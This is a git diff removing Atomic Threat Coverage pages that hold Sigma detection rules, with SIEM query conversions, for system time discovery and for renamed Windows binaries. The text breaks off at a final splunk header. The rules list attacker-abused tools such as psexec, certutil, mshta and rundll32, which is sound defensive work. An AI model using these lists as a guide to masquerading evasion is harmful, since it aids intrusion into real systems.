-| **ATT&amp;CK Technique** | <ul><li>[T1124: System Time Discovery](https://attack.mitre.org/techniques/T1124)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1124: System Time Discovery](../Triggers/T1124.md)</li></ul>  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Legitimate use of the system utilities to discover system time for legitimate reason</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html](https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html)</li><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md)</li></ul>  |
-| **Author**               | E.M. Anhaus (orignally from Atomic Blue Detections, Endgame), oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Discovery of a System Time
-id: b243b280-65fe-48df-ba07-6ddea7646427
-description: "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system."
-status: experimental
-author: E.M. Anhaus (orignally from Atomic Blue Detections, Endgame), oscd.community
-date: 2019/10/24
-modified: 2019/11/11
-references:
-    - https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md
-tags:
-    - attack.discovery
-    - attack.t1124
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-      - Image|endswith: 
-            - '\net.exe'
-            - '\net1.exe'
-        CommandLine|contains: 'time'
-      - Image|endswith: '\w32tm.exe'
-        CommandLine|contains: 'tz'
-      - Image|endswith: '\powershell.exe'
-        CommandLine|contains: 'Get-Date'
-    condition: selection
-falsepositives:
-    - Legitimate use of the system utilities to discover system time for legitimate reason
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and ((($_.message -match "Image.*.*\\net.exe" -or $_.message -match "Image.*.*\\net1.exe") -and $_.message -match "CommandLine.*.*time.*") -or ($_.message -match "Image.*.*\\w32tm.exe" -and $_.message -match "CommandLine.*.*tz.*") -or ($_.message -match "Image.*.*\\powershell.exe" -and $_.message -match "CommandLine.*.*Get-Date.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:(*\\net.exe OR *\\net1.exe) AND winlog.event_data.CommandLine.keyword:*time*) OR (winlog.event_data.Image.keyword:*\\w32tm.exe AND winlog.event_data.CommandLine.keyword:*tz*) OR (winlog.event_data.Image.keyword:*\\powershell.exe AND winlog.event_data.CommandLine.keyword:*Get\-Date*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/b243b280-65fe-48df-ba07-6ddea7646427 <<EOF
-{
-  "metadata": {
-    "title": "Discovery of a System Time",
-    "description": "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.",
-    "tags": [
-      "attack.discovery",
-      "attack.t1124"
-    ],
-    "query": "((winlog.event_data.Image.keyword:(*\\\\net.exe OR *\\\\net1.exe) AND winlog.event_data.CommandLine.keyword:*time*) OR (winlog.event_data.Image.keyword:*\\\\w32tm.exe AND winlog.event_data.CommandLine.keyword:*tz*) OR (winlog.event_data.Image.keyword:*\\\\powershell.exe AND winlog.event_data.CommandLine.keyword:*Get\\-Date*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:(*\\\\net.exe OR *\\\\net1.exe) AND winlog.event_data.CommandLine.keyword:*time*) OR (winlog.event_data.Image.keyword:*\\\\w32tm.exe AND winlog.event_data.CommandLine.keyword:*tz*) OR (winlog.event_data.Image.keyword:*\\\\powershell.exe AND winlog.event_data.CommandLine.keyword:*Get\\-Date*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Discovery of a System Time'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:(*\\net.exe *\\net1.exe) AND CommandLine.keyword:*time*) OR (Image.keyword:*\\w32tm.exe AND CommandLine.keyword:*tz*) OR (Image.keyword:*\\powershell.exe AND CommandLine.keyword:*Get\-Date*))
-```
-
-
-### splunk
-    
-```
-(((Image="*\\net.exe" OR Image="*\\net1.exe") CommandLine="*time*") OR (Image="*\\w32tm.exe" CommandLine="*tz*") OR (Image="*\\powershell.exe" CommandLine="*Get-Date*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((Image IN ["*\\net.exe", "*\\net1.exe"] CommandLine="*time*") OR (Image="*\\w32tm.exe" CommandLine="*tz*") OR (Image="*\\powershell.exe" CommandLine="*Get-Date*")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*(?:.*.*\net\.exe|.*.*\net1\.exe))(?=.*.*time.*))|.*(?:.*(?=.*.*\w32tm\.exe)(?=.*.*tz.*))|.*(?:.*(?=.*.*\powershell\.exe)(?=.*.*Get-Date.*))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_renamed_binary.md b/Atomic_Threat_Coverage/Detection_Rules/win_renamed_binary.md
deleted file mode 100644
index eb1de05..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_renamed_binary.md
+++ /dev/null
@@ -1,217 +0,0 @@
-| Title                    | Renamed Binary       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://attack.mitre.org/techniques/T1036/](https://attack.mitre.org/techniques/T1036/)</li><li>[https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html](https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html)</li><li>[https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html](https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html)</li></ul>  |
-| **Author**               | Matthew Green - @mgreen27, Ecco, James Pemberton / @4A616D6573, oscd.community (improvements), Andreas Hunkeler (@Karneades) |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Renamed Binary
-id: 36480ae1-a1cb-4eaa-a0d6-29801d7e9142
-status: experimental
-description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
-author: Matthew Green - @mgreen27, Ecco, James Pemberton / @4A616D6573, oscd.community (improvements), Andreas Hunkeler (@Karneades)
-date: 2019/06/15
-modified: 2019/11/11
-references:
-    - https://attack.mitre.org/techniques/T1036/
-    - https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html
-    - https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html
-tags:
-    - attack.t1036
-    - attack.defense_evasion
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        OriginalFileName:
-            - 'cmd.exe'
-            - 'powershell.exe'
-            - 'powershell_ise.exe'
-            - 'psexec.exe'
-            - 'psexec.c'  # old versions of psexec (2016 seen)
-            - 'cscript.exe'
-            - 'wscript.exe'
-            - 'mshta.exe'
-            - 'regsvr32.exe'
-            - 'wmic.exe'
-            - 'certutil.exe'
-            - 'rundll32.exe'
-            - 'cmstp.exe'
-            - 'msiexec.exe'
-            - '7z.exe'
-            - 'winrar.exe'
-            - 'wevtutil.exe'
-            - 'net.exe'
-            - 'net1.exe'
-            - 'netsh.exe'
-    filter:
-        Image|endswith:
-            - '\cmd.exe'
-            - '\powershell.exe'
-            - '\powershell_ise.exe'
-            - '\psexec.exe'
-            - '\psexec64.exe'
-            - '\cscript.exe'
-            - '\wscript.exe'
-            - '\mshta.exe'
-            - '\regsvr32.exe'
-            - '\wmic.exe'
-            - '\certutil.exe'
-            - '\rundll32.exe'
-            - '\cmstp.exe'
-            - '\msiexec.exe'
-            - '\7z.exe'
-            - '\winrar.exe'
-            - '\wevtutil.exe'
-            - '\net.exe'
-            - '\net1.exe'
-            - '\netsh.exe'
-    condition: selection and not filter
-falsepositives:
-    - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "cmd.exe" -or $_.message -match "powershell.exe" -or $_.message -match "powershell_ise.exe" -or $_.message -match "psexec.exe" -or $_.message -match "psexec.c" -or $_.message -match "cscript.exe" -or $_.message -match "wscript.exe" -or $_.message -match "mshta.exe" -or $_.message -match "regsvr32.exe" -or $_.message -match "wmic.exe" -or $_.message -match "certutil.exe" -or $_.message -match "rundll32.exe" -or $_.message -match "cmstp.exe" -or $_.message -match "msiexec.exe" -or $_.message -match "7z.exe" -or $_.message -match "winrar.exe" -or $_.message -match "wevtutil.exe" -or $_.message -match "net.exe" -or $_.message -match "net1.exe" -or $_.message -match "netsh.exe") -and  -not (($_.message -match "Image.*.*\\cmd.exe" -or $_.message -match "Image.*.*\\powershell.exe" -or $_.message -match "Image.*.*\\powershell_ise.exe" -or $_.message -match "Image.*.*\\psexec.exe" -or $_.message -match "Image.*.*\\psexec64.exe" -or $_.message -match "Image.*.*\\cscript.exe" -or $_.message -match "Image.*.*\\wscript.exe" -or $_.message -match "Image.*.*\\mshta.exe" -or $_.message -match "Image.*.*\\regsvr32.exe" -or $_.message -match "Image.*.*\\wmic.exe" -or $_.message -match "Image.*.*\\certutil.exe" -or $_.message -match "Image.*.*\\rundll32.exe" -or $_.message -match "Image.*.*\\cmstp.exe" -or $_.message -match "Image.*.*\\msiexec.exe" -or $_.message -match "Image.*.*\\7z.exe" -or $_.message -match "Image.*.*\\winrar.exe" -or $_.message -match "Image.*.*\\wevtutil.exe" -or $_.message -match "Image.*.*\\net.exe" -or $_.message -match "Image.*.*\\net1.exe" -or $_.message -match "Image.*.*\\netsh.exe"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(OriginalFileName:("cmd.exe" OR "powershell.exe" OR "powershell_ise.exe" OR "psexec.exe" OR "psexec.c" OR "cscript.exe" OR "wscript.exe" OR "mshta.exe" OR "regsvr32.exe" OR "wmic.exe" OR "certutil.exe" OR "rundll32.exe" OR "cmstp.exe" OR "msiexec.exe" OR "7z.exe" OR "winrar.exe" OR "wevtutil.exe" OR "net.exe" OR "net1.exe" OR "netsh.exe") AND (NOT (winlog.event_data.Image.keyword:(*\\cmd.exe OR *\\powershell.exe OR *\\powershell_ise.exe OR *\\psexec.exe OR *\\psexec64.exe OR *\\cscript.exe OR *\\wscript.exe OR *\\mshta.exe OR *\\regsvr32.exe OR *\\wmic.exe OR *\\certutil.exe OR *\\rundll32.exe OR *\\cmstp.exe OR *\\msiexec.exe OR *\\7z.exe OR *\\winrar.exe OR *\\wevtutil.exe OR *\\net.exe OR *\\net1.exe OR *\\netsh.exe))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/36480ae1-a1cb-4eaa-a0d6-29801d7e9142 <<EOF
-{
-  "metadata": {
-    "title": "Renamed Binary",
-    "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.",
-    "tags": [
-      "attack.t1036",
-      "attack.defense_evasion"
-    ],
-    "query": "(OriginalFileName:(\"cmd.exe\" OR \"powershell.exe\" OR \"powershell_ise.exe\" OR \"psexec.exe\" OR \"psexec.c\" OR \"cscript.exe\" OR \"wscript.exe\" OR \"mshta.exe\" OR \"regsvr32.exe\" OR \"wmic.exe\" OR \"certutil.exe\" OR \"rundll32.exe\" OR \"cmstp.exe\" OR \"msiexec.exe\" OR \"7z.exe\" OR \"winrar.exe\" OR \"wevtutil.exe\" OR \"net.exe\" OR \"net1.exe\" OR \"netsh.exe\") AND (NOT (winlog.event_data.Image.keyword:(*\\\\cmd.exe OR *\\\\powershell.exe OR *\\\\powershell_ise.exe OR *\\\\psexec.exe OR *\\\\psexec64.exe OR *\\\\cscript.exe OR *\\\\wscript.exe OR *\\\\mshta.exe OR *\\\\regsvr32.exe OR *\\\\wmic.exe OR *\\\\certutil.exe OR *\\\\rundll32.exe OR *\\\\cmstp.exe OR *\\\\msiexec.exe OR *\\\\7z.exe OR *\\\\winrar.exe OR *\\\\wevtutil.exe OR *\\\\net.exe OR *\\\\net1.exe OR *\\\\netsh.exe))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(OriginalFileName:(\"cmd.exe\" OR \"powershell.exe\" OR \"powershell_ise.exe\" OR \"psexec.exe\" OR \"psexec.c\" OR \"cscript.exe\" OR \"wscript.exe\" OR \"mshta.exe\" OR \"regsvr32.exe\" OR \"wmic.exe\" OR \"certutil.exe\" OR \"rundll32.exe\" OR \"cmstp.exe\" OR \"msiexec.exe\" OR \"7z.exe\" OR \"winrar.exe\" OR \"wevtutil.exe\" OR \"net.exe\" OR \"net1.exe\" OR \"netsh.exe\") AND (NOT (winlog.event_data.Image.keyword:(*\\\\cmd.exe OR *\\\\powershell.exe OR *\\\\powershell_ise.exe OR *\\\\psexec.exe OR *\\\\psexec64.exe OR *\\\\cscript.exe OR *\\\\wscript.exe OR *\\\\mshta.exe OR *\\\\regsvr32.exe OR *\\\\wmic.exe OR *\\\\certutil.exe OR *\\\\rundll32.exe OR *\\\\cmstp.exe OR *\\\\msiexec.exe OR *\\\\7z.exe OR *\\\\winrar.exe OR *\\\\wevtutil.exe OR *\\\\net.exe OR *\\\\net1.exe OR *\\\\netsh.exe))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Renamed Binary'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(OriginalFileName:("cmd.exe" "powershell.exe" "powershell_ise.exe" "psexec.exe" "psexec.c" "cscript.exe" "wscript.exe" "mshta.exe" "regsvr32.exe" "wmic.exe" "certutil.exe" "rundll32.exe" "cmstp.exe" "msiexec.exe" "7z.exe" "winrar.exe" "wevtutil.exe" "net.exe" "net1.exe" "netsh.exe") AND (NOT (Image.keyword:(*\\cmd.exe *\\powershell.exe *\\powershell_ise.exe *\\psexec.exe *\\psexec64.exe *\\cscript.exe *\\wscript.exe *\\mshta.exe *\\regsvr32.exe *\\wmic.exe *\\certutil.exe *\\rundll32.exe *\\cmstp.exe *\\msiexec.exe *\\7z.exe *\\winrar.exe *\\wevtutil.exe *\\net.exe *\\net1.exe *\\netsh.exe))))
-```
-
-
-### splunk
-    
-```
-((OriginalFileName="cmd.exe" OR OriginalFileName="powershell.exe" OR OriginalFileName="powershell_ise.exe" OR OriginalFileName="psexec.exe" OR OriginalFileName="psexec.c" OR OriginalFileName="cscript.exe" OR OriginalFileName="wscript.exe" OR OriginalFileName="mshta.exe" OR OriginalFileName="regsvr32.exe" OR OriginalFileName="wmic.exe" OR OriginalFileName="certutil.exe" OR OriginalFileName="rundll32.exe" OR OriginalFileName="cmstp.exe" OR OriginalFileName="msiexec.exe" OR OriginalFileName="7z.exe" OR OriginalFileName="winrar.exe" OR OriginalFileName="wevtutil.exe" OR OriginalFileName="net.exe" OR OriginalFileName="net1.exe" OR OriginalFileName="netsh.exe") NOT ((Image="*\\cmd.exe" OR Image="*\\powershell.exe" OR Image="*\\powershell_ise.exe" OR Image="*\\psexec.exe" OR Image="*\\psexec64.exe" OR Image="*\\cscript.exe" OR Image="*\\wscript.exe" OR Image="*\\mshta.exe" OR Image="*\\regsvr32.exe" OR Image="*\\wmic.exe" OR Image="*\\certutil.exe" OR Image="*\\rundll32.exe" OR Image="*\\cmstp.exe" OR Image="*\\msiexec.exe" OR Image="*\\7z.exe" OR Image="*\\winrar.exe" OR Image="*\\wevtutil.exe" OR Image="*\\net.exe" OR Image="*\\net1.exe" OR Image="*\\netsh.exe")))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" OriginalFileName IN ["cmd.exe", "powershell.exe", "powershell_ise.exe", "psexec.exe", "psexec.c", "cscript.exe", "wscript.exe", "mshta.exe", "regsvr32.exe", "wmic.exe", "certutil.exe", "rundll32.exe", "cmstp.exe", "msiexec.exe", "7z.exe", "winrar.exe", "wevtutil.exe", "net.exe", "net1.exe", "netsh.exe"]  -(Image IN ["*\\cmd.exe", "*\\powershell.exe", "*\\powershell_ise.exe", "*\\psexec.exe", "*\\psexec64.exe", "*\\cscript.exe", "*\\wscript.exe", "*\\mshta.exe", "*\\regsvr32.exe", "*\\wmic.exe", "*\\certutil.exe", "*\\rundll32.exe", "*\\cmstp.exe", "*\\msiexec.exe", "*\\7z.exe", "*\\winrar.exe", "*\\wevtutil.exe", "*\\net.exe", "*\\net1.exe", "*\\netsh.exe"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*cmd\.exe|.*powershell\.exe|.*powershell_ise\.exe|.*psexec\.exe|.*psexec\.c|.*cscript\.exe|.*wscript\.exe|.*mshta\.exe|.*regsvr32\.exe|.*wmic\.exe|.*certutil\.exe|.*rundll32\.exe|.*cmstp\.exe|.*msiexec\.exe|.*7z\.exe|.*winrar\.exe|.*wevtutil\.exe|.*net\.exe|.*net1\.exe|.*netsh\.exe))(?=.*(?!.*(?:.*(?=.*(?:.*.*\cmd\.exe|.*.*\powershell\.exe|.*.*\powershell_ise\.exe|.*.*\psexec\.exe|.*.*\psexec64\.exe|.*.*\cscript\.exe|.*.*\wscript\.exe|.*.*\mshta\.exe|.*.*\regsvr32\.exe|.*.*\wmic\.exe|.*.*\certutil\.exe|.*.*\rundll32\.exe|.*.*\cmstp\.exe|.*.*\msiexec\.exe|.*.*\7z\.exe|.*.*\winrar\.exe|.*.*\wevtutil\.exe|.*.*\net\.exe|.*.*\net1\.exe|.*.*\netsh\.exe))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_renamed_binary_highly_relevant.md b/Atomic_Threat_Coverage/Detection_Rules/win_renamed_binary_highly_relevant.md
deleted file mode 100644
index 8c21899..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_renamed_binary_highly_relevant.md
+++ /dev/null
@@ -1,202 +0,0 @@
-| Title                    | Highly Relevant Renamed Binary       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://attack.mitre.org/techniques/T1036/](https://attack.mitre.org/techniques/T1036/)</li><li>[https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html](https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html)</li><li>[https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html](https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html)</li></ul>  |
-| **Author**               | Matthew Green - @mgreen27, Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Highly Relevant Renamed Binary
-id: 0ba1da6d-b6ce-4366-828c-18826c9de23e
-status: experimental
-description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
-author: Matthew Green - @mgreen27, Florian Roth
-date: 2019/06/15
-references:
-    - https://attack.mitre.org/techniques/T1036/
-    - https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html
-    - https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html
-tags:
-    - attack.t1036
-    - attack.defense_evasion
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        OriginalFileName:
-            - "powershell.exe"
-            - "powershell_ise.exe"
-            - "psexec.exe"
-            - "psexec.c"  # old versions of psexec (2016 seen)
-            - "cscript.exe"
-            - "wscript.exe"
-            - "mshta.exe"
-            - "regsvr32.exe"
-            - "wmic.exe"
-            - "certutil.exe"
-            - "rundll32.exe"
-            - "cmstp.exe"
-            - "msiexec.exe"
-    filter:
-        Image:
-            - '*\powershell.exe'
-            - '*\powershell_ise.exe'
-            - '*\psexec.exe'
-            - '*\psexec64.exe'
-            - '*\cscript.exe'
-            - '*\wscript.exe'
-            - '*\mshta.exe'
-            - '*\regsvr32.exe'
-            - '*\wmic.exe'
-            - '*\certutil.exe'
-            - '*\rundll32.exe'
-            - '*\cmstp.exe'
-            - '*\msiexec.exe'
-    condition: selection and not filter
-falsepositives:
-    - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "powershell.exe" -or $_.message -match "powershell_ise.exe" -or $_.message -match "psexec.exe" -or $_.message -match "psexec.c" -or $_.message -match "cscript.exe" -or $_.message -match "wscript.exe" -or $_.message -match "mshta.exe" -or $_.message -match "regsvr32.exe" -or $_.message -match "wmic.exe" -or $_.message -match "certutil.exe" -or $_.message -match "rundll32.exe" -or $_.message -match "cmstp.exe" -or $_.message -match "msiexec.exe") -and  -not (($_.message -match "Image.*.*\\powershell.exe" -or $_.message -match "Image.*.*\\powershell_ise.exe" -or $_.message -match "Image.*.*\\psexec.exe" -or $_.message -match "Image.*.*\\psexec64.exe" -or $_.message -match "Image.*.*\\cscript.exe" -or $_.message -match "Image.*.*\\wscript.exe" -or $_.message -match "Image.*.*\\mshta.exe" -or $_.message -match "Image.*.*\\regsvr32.exe" -or $_.message -match "Image.*.*\\wmic.exe" -or $_.message -match "Image.*.*\\certutil.exe" -or $_.message -match "Image.*.*\\rundll32.exe" -or $_.message -match "Image.*.*\\cmstp.exe" -or $_.message -match "Image.*.*\\msiexec.exe"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(OriginalFileName:("powershell.exe" OR "powershell_ise.exe" OR "psexec.exe" OR "psexec.c" OR "cscript.exe" OR "wscript.exe" OR "mshta.exe" OR "regsvr32.exe" OR "wmic.exe" OR "certutil.exe" OR "rundll32.exe" OR "cmstp.exe" OR "msiexec.exe") AND (NOT (winlog.event_data.Image.keyword:(*\\powershell.exe OR *\\powershell_ise.exe OR *\\psexec.exe OR *\\psexec64.exe OR *\\cscript.exe OR *\\wscript.exe OR *\\mshta.exe OR *\\regsvr32.exe OR *\\wmic.exe OR *\\certutil.exe OR *\\rundll32.exe OR *\\cmstp.exe OR *\\msiexec.exe))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/0ba1da6d-b6ce-4366-828c-18826c9de23e <<EOF
-{
-  "metadata": {
-    "title": "Highly Relevant Renamed Binary",
-    "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.",
-    "tags": [
-      "attack.t1036",
-      "attack.defense_evasion"
-    ],
-    "query": "(OriginalFileName:(\"powershell.exe\" OR \"powershell_ise.exe\" OR \"psexec.exe\" OR \"psexec.c\" OR \"cscript.exe\" OR \"wscript.exe\" OR \"mshta.exe\" OR \"regsvr32.exe\" OR \"wmic.exe\" OR \"certutil.exe\" OR \"rundll32.exe\" OR \"cmstp.exe\" OR \"msiexec.exe\") AND (NOT (winlog.event_data.Image.keyword:(*\\\\powershell.exe OR *\\\\powershell_ise.exe OR *\\\\psexec.exe OR *\\\\psexec64.exe OR *\\\\cscript.exe OR *\\\\wscript.exe OR *\\\\mshta.exe OR *\\\\regsvr32.exe OR *\\\\wmic.exe OR *\\\\certutil.exe OR *\\\\rundll32.exe OR *\\\\cmstp.exe OR *\\\\msiexec.exe))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(OriginalFileName:(\"powershell.exe\" OR \"powershell_ise.exe\" OR \"psexec.exe\" OR \"psexec.c\" OR \"cscript.exe\" OR \"wscript.exe\" OR \"mshta.exe\" OR \"regsvr32.exe\" OR \"wmic.exe\" OR \"certutil.exe\" OR \"rundll32.exe\" OR \"cmstp.exe\" OR \"msiexec.exe\") AND (NOT (winlog.event_data.Image.keyword:(*\\\\powershell.exe OR *\\\\powershell_ise.exe OR *\\\\psexec.exe OR *\\\\psexec64.exe OR *\\\\cscript.exe OR *\\\\wscript.exe OR *\\\\mshta.exe OR *\\\\regsvr32.exe OR *\\\\wmic.exe OR *\\\\certutil.exe OR *\\\\rundll32.exe OR *\\\\cmstp.exe OR *\\\\msiexec.exe))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Highly Relevant Renamed Binary'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(OriginalFileName:("powershell.exe" "powershell_ise.exe" "psexec.exe" "psexec.c" "cscript.exe" "wscript.exe" "mshta.exe" "regsvr32.exe" "wmic.exe" "certutil.exe" "rundll32.exe" "cmstp.exe" "msiexec.exe") AND (NOT (Image.keyword:(*\\powershell.exe *\\powershell_ise.exe *\\psexec.exe *\\psexec64.exe *\\cscript.exe *\\wscript.exe *\\mshta.exe *\\regsvr32.exe *\\wmic.exe *\\certutil.exe *\\rundll32.exe *\\cmstp.exe *\\msiexec.exe))))
-```
-
-
-### splunk
-    
-```
